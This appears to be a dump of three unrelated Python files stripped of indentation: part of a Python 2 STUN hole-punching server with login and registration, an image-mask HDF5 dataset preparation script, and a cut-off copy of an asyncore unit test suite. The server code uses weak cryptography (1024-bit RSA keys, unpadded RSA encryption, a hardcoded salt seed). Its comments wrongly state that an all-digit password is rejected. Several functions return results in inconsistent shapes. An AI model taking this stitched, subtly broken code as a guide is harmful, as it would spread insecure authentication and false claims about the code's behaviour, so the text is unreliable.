self.peer_map = {}
self.error_log = []
self.master_log = [] # all messages received
self.message_log_map = {} # log per message type.
self.key_map = {} # RSA key map for peers attempting registration.
self.connection_state = ConnectionState(False)
if start_listen_thread:
self.activate()
def log_error(self, error_message, extra=None):
err_msg = "[STUN_Server] Line #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info())
timestamp = time.time()
date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
self.error_log.append((timestamp, date_string, err_msg, extra))
def shutdown(self):
self.connection_state.active = False
self.tcp_server.disconnect()
def restart(self):
self.shutdown()
self.activate()
def activate(self, local_ip=None, local_port=None, buffer_size=None):
self.local_ip = local_ip if local_ip != None else self.local_ip
self.local_port = local_port if local_port != None else self.local_port
self.buffer_size = buffer_size if buffer_size != None else self.buffer_size
self.connection_state.active = False
self.connection_state = ConnectionState(True)
if(self.database_config_file == None):
# attempt to get the current directory path (networking module) and assume a database_conf.json is there.
self.database_config_file = "%s/database_conf.json" % os.path.dirname(os.path.realpath(__file__))
self.load_database_settings()
#self.init_database() # legacy direct sql connection init method. Replaced with SqlAlchemy ORM.
self.init_tcp_server(self.local_ip, self.local_port, self.buffer_size)
Thread(target=self.meta_watch).start()
Thread(target=self.main_listen_loop).start()
def load_database_settings(self):
contents = ""
f = open(self.database_config_file, "r+")
contents = f.read()
f.close()
db_config_map = json.loads(contents)
self.hostname = db_config_map["hostname"]
self.db_username = db_config_map["username"]
self.db_password = db_config_map["password"]
self.db_name = db_config_map["database"]
def init_database(self):
try:
if hasattr(self, "db_connection"):
self.db_connection.close()
except:
pass;
#connection_string = "dbname=%s user=%s password=%s host=%s" % (self.db_name, self.db_username, self.db_password, self.hostname);
#self.db_connection = psycopg2.connect(connection_string); # cursors are not thread-safe, so create them separately for each thread.
def init_tcp_server(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=30788, buffer_size=1024):
self.local_ip = local_ip;
self.local_port = local_port;
self.buffer_size = buffer_size;
self.tcp_server = tcp.TCP_Server(self.local_ip, self.local_port, self.buffer_size);
def get_active_peer_map(self):
session = stun_alchemy.Session();
active_time = datetime.datetime.utcnow() - timedelta(seconds=self.peer_timeout); # <peer_timeout> seconds into the past.
results = [];
try:
resultset = session.query(Stun_User).\
filter(Stun_User.last_active >= active_time).\
filter(Stun_User.logged_in == True).\
order_by(Stun_User.username).\
all();
for user in resultset:
results.append([user.username, user.profile_map]);
except:
results = [];
session.close();
return results;
def generate_rsa_keys(self):
random_generator = Random.new().read
key = RSA.generate(1024, random_generator)
return key;
def generate_registration_key(self, ip_address, port, username):
key = self.generate_rsa_keys();
client_key = "%s_%s_%s" % (ip_address, port, username);
self.key_map[client_key] = key;
public_key = key.publickey();
public_key_string = public_key.exportKey("OpenSSH");
response = "registration_key %s" % public_key_string;
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
def get_salt_and_key(self, username, ip_address, port):
result = None;
session = stun_alchemy.Session();
resultset = session.query(Stun_User).filter(Stun_User.username == username).all();
self.resultset = [resultset, username, ip_address, port]
if len(resultset) < 1:
session.close();
return auth.create_fake_salt_and_key(username, "sda8901234lfk");
user = resultset[0];
dynamic_key = auth.get_dynamic_key(stun_alchemy.Session, Stun_User, user, True); # force new key
salt = auth.extract_salt_from_key(user.salt_key);
result = [salt, dynamic_key];
user.auth_ip_address = ip_address;
user.auth_port = port;
session.commit();
session.close();
return result;
def authenticate_user(self, username, password, ip_address, port, login=True, available_ports=None, used_ports=None):
result = (False, None, "Invalid username/password.");
session = stun_alchemy.Session();
results = session.query(Stun_User).\
filter(Stun_User.username == username).\
filter(Stun_User.auth_ip_address == ip_address).\
filter(Stun_User.auth_port == port).\
all();
if len(results) < 1:
session.close();
return (False, None, "Invalid username/password.");
user = results[0];
result = auth.auth_password(stun_alchemy.Session, Stun_User, user, password, ip_address);
if result:
user.last_active = datetime.datetime.utcnow();
user.ip_address = ip_address;
user.port = port;
user.logged_in = login;
if available_ports != None:
user.available_ports = available_ports
if used_ports != None:
user.used_ports = used_ports
session.commit();
result = (True, user.profile_map, None);
session.close();
return result;
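# Authentication flow (summary, as implemented in main_listen_loop() below):
#   1. the client sends "auth_salt_request <username>"; the server answers
#      "auth_keys [salt, dynamic_key]" via get_salt_and_key() above
#   2. the client sends "authenticate [username, hashed_password, login,
#      available_ports, used_ports]"
#   3. authenticate_user() verifies the password via auth.auth_password() and the server
#      replies "auth_response [success, username, profile_map, login, error_message]"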
def is_authenticated(self, username, ip_address, port):
result = False;
time_out = datetime.datetime.utcnow() - timedelta(seconds = self.peer_timeout);
session = stun_alchemy.Session();
results = session.query(Stun_User).\
filter(Stun_User.username == username).\
filter(Stun_User.auth_ip_address == ip_address).\
filter(Stun_User.auth_port == port).\
filter(Stun_User.last_active >= time_out).\
filter(Stun_User.logged_in == True).\
all();
if len(results) < 1:
result = False;
else:
result = True;
session.close();
return result;
def user_is_active(self, username):
result = None;
time_out = datetime.datetime.utcnow() - timedelta(seconds = self.peer_timeout);
session = stun_alchemy.Session();
results = session.query(Stun_User).\
filter(Stun_User.username == username).\
filter(Stun_User.last_active >= time_out).\
filter(Stun_User.logged_in == True).\
all();
if len(results) < 1:
result = None;
else:
result = results[0];
session.close();
return result;
def check_login_status_of_all_users(self):
session = stun_alchemy.Session();
try:
resultset = session.query(Stun_User).\
filter(Stun_User.logged_in == True).\
order_by(Stun_User.username).\
all();
for user in resultset:
if not self.user_is_active(user.username):
user.logged_in = False;
session.commit();
except:
pass;
session.close();
def is_acceptable_password(self, password):
"""Returns True only if password length >= 8 and contains both letters and numbers
Note: special characters are allowed, but they are merely optional. They do not count towards the alphanumeric requirement."""
has_alphas_and_numbers = re.match(r"^(?=.+[\w])(?=.+[\d])",password) != None;
return (has_alphas_and_numbers and (len(password) >= 8))
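# Illustrative behaviour of is_acceptable_password (assuming the letter/digit check above):
#   is_acceptable_password("password1!") -> True  (letters and a digit, length >= 8)
#   is_acceptable_password("password")   -> False (no digit)
#   is_acceptable_password("12345678")   -> False (no letter)
#   is_acceptable_password("pass1")      -> False (shorter than 8 characters)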
def register_user(self, username, password, profile_map, ip_address, port, registration_type="permanent"):
result = (False, username, profile_map, "Error: Registration failed.");
session = stun_alchemy.Session();
if not self.is_acceptable_password(password):
session.close();
return (False, "Invalid password. Password must be at least 8 characters long and contain both letters and numbers (special characters are optional).");
results = session.query(Stun_User).filter(func.lower(Stun_User.username) == func.lower(username)).all();
if len(results) >= 1:
session.close();
return (False, username, profile_map, "Username is already in use.");
result = [True, username, profile_map, None];
salt_key = auth.create_saltkey(username);
salt = auth.extract_salt_from_key(salt_key)
salt_and_pass = "%s%s" % (salt, password)
hashed_password = hashlib.sha384(salt_and_pass).hexdigest();
user = Stun_User(username=username, password=hashed_password, ip_address=ip_address, port=port, salt_key=salt_key, profile_map=json.dumps(profile_map), logged_in=False);
session.add(user);
session.commit();
session.close();
return result;
def get_unused_port(self, user):
result = None;
if user.available_ports == None:
return None;
available_ports = json.loads(user.available_ports);
used_ports = json.loads(user.used_ports);
print "available_ports: %s" % available_ports;
for port_range in available_ports:
for i in range(port_range[0], port_range[1]):
if i not in used_ports:
return i;
return result;
def update_user_used_ports(self, user, port):
session = stun_alchemy.Session();
used_ports = json.loads(user.used_ports);
used_ports.append(port);
user.used_ports = json.dumps(used_ports);
session.commit();
session.close();
def meta_watch(self):
# Maintains up-to-date information about online users and their metadata (username, ip, port, etc.) and periodically reports it to all connected clients.
connection_state = self.connection_state
server = self.tcp_server
while connection_state.active:
# Check all logged-in users to see if still logged in.
self.check_login_status_of_all_users();
# Grab peer data from db.
self.peer_map = self.get_active_peer_map();
# Notify all clients of the list of peers.
response = "peer_map %s" % json.dumps(self.peer_map);
self.tcp_server.send_message(response);
time.sleep(self.metainfo_update_thread_sleep_duration);
def handle_hole_punch_request(self, message_body, ip_address, port):
# message_body should be [requestee_ip, requestee_port, requestee_username, target_username, buffer_size]
message_data = json.loads(message_body);
requestee_ip, requestee_port, username, target_username, buffer_size = message_data
# confirm the requestee is authenticated before proceeding.
if not self.is_authenticated(username, ip_address, port):
recipients = [(ip_address, port),];
response = "hole_punch_request_rejected %s" % json.dumps([0, target_username, "You're not logged in."]);
self.tcp_server.send_message(response, recipients);
return False;
# confirm the target user exists and is active.
peer = self.user_is_active(target_username);
if not peer:
recipients = [(ip_address, port),];
response = "hole_punch_request_rejected %s" % json.dumps([1, target_username, "Peer isn't available (not logged in / doesn't exist)."]);
self.tcp_server.send_message(response, recipients);
return False;
# send request to target_user
selected_port = self.get_unused_port(peer);
# Mark the port as used. A re-auth request may overwrite this again, but the window is small
# and the state corrects itself: the client rejects the request if it is already hole punching on that port.
self.update_user_used_ports(peer, selected_port);
response_data = [peer.auth_ip_address, selected_port, requestee_ip, requestee_port, username, buffer_size];
# [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size]
recipients = [(peer.auth_ip_address, peer.auth_port),];
response = "hole_punch %s" % json.dumps(response_data);
self.tcp_server.send_message(response, recipients);
return True;
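# Hole-punch message flow implemented by this server (summary):
#   1. client A sends "request_hole_punch" -> handle_hole_punch_request() above
#   2. the server picks an unused port for target B and sends B a "hole_punch" message
#   3. B replies "hole_punch_ack" (or "hole_punch_reject" when the port is in use),
#      handled in main_listen_loop() below
#   4. on ack, the server sends "init_hole_punch" to both peers so they can connect
#      to each other directly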
def main_listen_loop(self):
connection_state = self.connection_state;
server = self.tcp_server;
message_object = None
while connection_state.active:
try:
message_object = self.tcp_server.pop_message();
self.master_log.append(message_object);
is_valid_message = ((message_object != None) and (len(message_object) > 2));
if is_valid_message:
message = message_object[2];
message_type, message_body = message.split(" ",1);
if message_type not in self.message_log_map:
self.message_log_map[message_type] = [];
self.message_log_map[message_type].append(message_object);
#print "MESSAGE: %s\n" % message_object;
ip_address, port = message_object[0];
if(message_type == "auth_salt_request"):
# message_body is the plain username string
message_data = message_body;
username = message_data;
# get the salt and key
salt_and_key = self.get_salt_and_key(username, ip_address, port);
response = "auth_keys %s" % json.dumps(salt_and_key);
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
elif(message_type == "authenticate"):
# message_body should be [username, hashed_password, login, available_ports, used_ports]
username, hashed_password, login, available_ports, used_ports = json.loads(message_body);
recipients = [(ip_address, port),];
success, profile_map, error_message = self.authenticate_user(username, hashed_password, ip_address, port, login, available_ports, used_ports);
response_data = [success, username, profile_map, login, error_message]
response = "auth_response %s" % json.dumps(response_data);
self.tcp_server.send_message(response, recipients);
elif(message_type == "register_key"):
# message_body should be "username"
username = message_body;
Thread(target=self.generate_registration_key, args=(ip_address, port, username)).start();
elif(message_type == "register"):
# message_body is "<username> <encrypted_string>", where the encrypted string decrypts to [username, password, profile_map, registration_type]
username, encrypted_string = message_body.split(" ", 1);
client_key = "%s_%s_%s" % (ip_address, port, username);
key = self.key_map[client_key];
json_string = key.decrypt(encrypted_string);
username, password, profile_map, registration_type = json.loads(json_string);
response_data = self.register_user(username, password, profile_map, ip_address, port, registration_type);
response = "registration_response %s" % json.dumps(response_data);
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
elif(message_type == "request_hole_punch"):
self.handle_hole_punch_request(message_body, ip_address, port);
elif(message_type == "hole_punch_ack"):
# message_body should be [target_ip, target_port, target_username, requestee_ip, requestee_port, requestee_username, buffer_size, port_in_use]
message_data = json.loads(message_body);
target_ip, target_port, target_username, requestee_ip, requestee_port, requestee_username, buffer_size, port_in_use = message_data
# message to send: listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size
requestee = self.user_is_active(requestee_username);
if requestee != None:
message_body = json.dumps([requestee_ip, requestee_port, target_ip, target_port, target_username, buffer_size]);
# Send init signal to requestee
response = "init_hole_punch %s" % message_body;
recipients = [(requestee.auth_ip_address, requestee.auth_port),];
self.tcp_server.send_message(response, recipients);
message_body = json.dumps([target_ip, target_port, requestee_ip, requestee_port, requestee_username, buffer_size]);
# Send init signal to target.
response = "init_hole_punch %s" % message_body;
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
elif(message_type == "hole_punch_reject"):
# message_body should be [target_ip, target_port, target_username, requestee_ip, requestee_port, requestee_username, buffer_size, port_in_use]
message_data = json.loads(message_body);
target_ip, target_port, target_username, requestee_ip, requestee_port, requestee_username, buffer_size, port_in_use = message_data
message_body = json.dumps([requestee_ip, requestee_port, requestee_username, target_username, buffer_size])
requestee = self.user_is_active(requestee_username);
if port_in_use:
# Assuming the requestee still exists and is logged in and active, get another port and make another hole_punch request to the target user.
if requestee != None:
self.handle_hole_punch_request(message_body, requestee.auth_ip_address, requestee.auth_port);
else:
# Inform the requestee that the request was rejected.
if requestee != None:
response = "hole_punch_request_rejected %s" % message_body;
recipients = [(requestee.auth_ip_address, requestee.auth_port),];
self.tcp_server.send_message(response, recipients);
except Exception as exc:
self.log_error(exc, message_object);
time.sleep(self.thread_sleep_duration);
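# Hedged sketch, not part of the original module: the client side of the registration
# handshake implied by generate_registration_key() and the "register_key"/"register"
# branches of main_listen_loop(). The client object (with send_message/pop_message) is
# hypothetical; only the message formats come from the server code above.
def _example_client_registration(client, username, password, profile_map):
    # 1. Ask the server for a registration key.
    client.send_message("register_key %s" % username)
    # 2. The server replies "registration_key <OpenSSH public key>"; import it.
    public_key_string = client.pop_message().split(" ", 1)[1]
    public_key = RSA.importKey(public_key_string)
    # 3. Encrypt [username, password, profile_map, registration_type] and send
    #    "register <username> <encrypted_string>".
    payload = json.dumps([username, password, profile_map, "permanent"])
    encrypted_string = public_key.encrypt(payload, 0)[0]
    client.send_message("register %s %s" % (username, encrypted_string))
    # 4. The server answers with "registration_response <json>".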
|
prepare_dataset.py
|
#!/usr/bin/python
import os
import json
import glob
import utils
import random
import tables
import argparse
import skimage.io
import numpy as np
import multiprocessing
from tqdm import tqdm
from math import ceil
from skimage.morphology import remove_small_objects
def start_process(target, args):
process = multiprocessing.Process(target=target, args=args, daemon=True)
process.start()
return process
def unique(uclasses, classes):
new, uc = [], uclasses[:]
for i in classes:
if i not in uc and i not in new:
new.append(i)
if new:
new.sort()
uclasses.append(new)
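# unique() appears to collect the class names from `classes` that are not yet stored in
# `uclasses` (file.root.classes) and, if any, appends them sorted, so the class vocabulary
# stays stable across repeated runs; the class_id values written by worker() index into it.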
def worker(n, files, classes, uclasses, colors, lock, conn):
pbar = tqdm(files, position=n)
uclasses = list(uclasses)
n_colors, n_classes = len(colors), len(classes)
for file in pbar:
pbar.set_description(utils.cut_string(file))
dir, name = os.path.dirname(file), os.path.splitext(os.path.basename(file))[0]
mask = skimage.io.imread(os.path.join(dir, name + '.mask.png'))
mask = mask.reshape((*mask.shape, 1)) if len(mask.shape) <= 2 else mask[:, :, [0]]
mask = mask.repeat(n_colors, axis=2) == colors
ind = [i for i in range(n_classes) if mask[::, ::, i].any()]
if ind:
mask = mask[:, :, ind]
for i in range(mask.shape[-1]):
remove_small_objects(mask[:, :, i], connectivity=2, in_place=True)
with lock:
conn.send((
file,
('image', skimage.io.imread(file)[:, :, :3]),
('mask', mask),
('class_id', np.array([uclasses.index(i) + 1 for i in classes[ind]], dtype='uint8'))
))
pbar.close()
def writer(file, filters, conn, lock):
count, polled, paths = file.root.count[0], True, []
while multiprocessing.active_children() or polled:
polled = conn.poll(1)
if polled:
path, *rest = conn.recv()
for i in rest:
category, value = i
arr = file.create_carray(file.root[category], '_' + str(count), obj=value, filters=filters)
paths.append(path)
count += 1
return paths
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Prepare dataset')
parser.add_argument('directory', metavar='DIR', help='Path to dataset', type=str)
parser.add_argument('-f', '--file', type=str, default='dataset.hdf5', help='HDF5 dataset file', metavar='F')
parser.add_argument('--train', metavar='P', help='Train weight', type=float, default=0.8)
parser.add_argument('--classes', metavar='C', help='Path to classes json', default='types.json')
parser.add_argument('-p', '--processes', type=int, default=1, help='Number of processes', metavar='N')
parser.add_argument('--complevel', type=int, default=9, help='Compression level', metavar='L')
parser.add_argument('--complib', type=str, default='blosc:lz4hc', help='Compression library', metavar='L')
parser.add_argument('--save_path', action='store_true', help='Save image path')
args = parser.parse_args()
assert 0 <= args.train <= 1, 'Train weight must be in range [0, 1]'
classes = np.array([i.encode('ascii') for i in json.load(open(os.path.join(args.directory, args.classes)))])
colors = np.array([i for i in range(1, len(classes) + 1)], dtype='uint8')
filters = tables.Filters(complevel=args.complevel, complib=args.complib)
file = utils.open_or_create_dataset_file(args.file, filters, ('image', 'mask', 'class_id'), True)
unique(file.root.classes, classes)
files = list(filter(lambda x: not x.endswith('.mask.png'), glob.iglob(os.path.join(args.directory, '**/*.png'), recursive=True)))
count = len(files)
random.shuffle(files)
pn, lock, processes = ceil(count / args.processes), multiprocessing.Lock(), []
conn_in, conn_out = multiprocessing.Pipe(False)
for i in range(args.processes):
processes.append(start_process(worker, (i, files[i * pn:(i + 1) * pn], classes, file.root.classes[:], colors, lock, conn_out)))
files = writer(file, filters, conn_in, lock)
for i in processes:
print()
if args.save_path:
utils.save_path(file, filters, files)
utils.split_dataset(file, len(files), args.train)
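# Rough sketch of the resulting HDF5 layout (assuming utils.open_or_create_dataset_file
# creates one group per listed category plus the classes and count nodes used above):
#   /image/_0, /image/_1, ...   RGB images stored as compressed carrays
#   /mask/_0,  /mask/_1,  ...   boolean masks, one channel per class present in the image
#   /class_id/_0, ...           uint8 class ids (1-based indices into /classes)
# utils.save_path and utils.split_dataset then optionally store the source paths and the
# train/validation split.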
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
import threading
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
from io import BytesIO
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.monotonic()
while n > 0 and time.monotonic() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
os_helper.unlink(addr)
socket_helper.bind_unix_socket(sock, addr)
else:
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@threading_helper.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = socket_helper.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((socket_helper.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
threading_helper.join_thread(t)
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(os_helper.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_recv(self):
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(os_helper.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(os_helper.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with warnings_helper.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
def test_close_twice(self):
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
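# Base handler whose event callbacks raise by default; each test overrides only the events it expects to fire.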
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
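# Mixin holding the actual API tests; the concrete subclasses below supply family, addr and use_poll.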
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
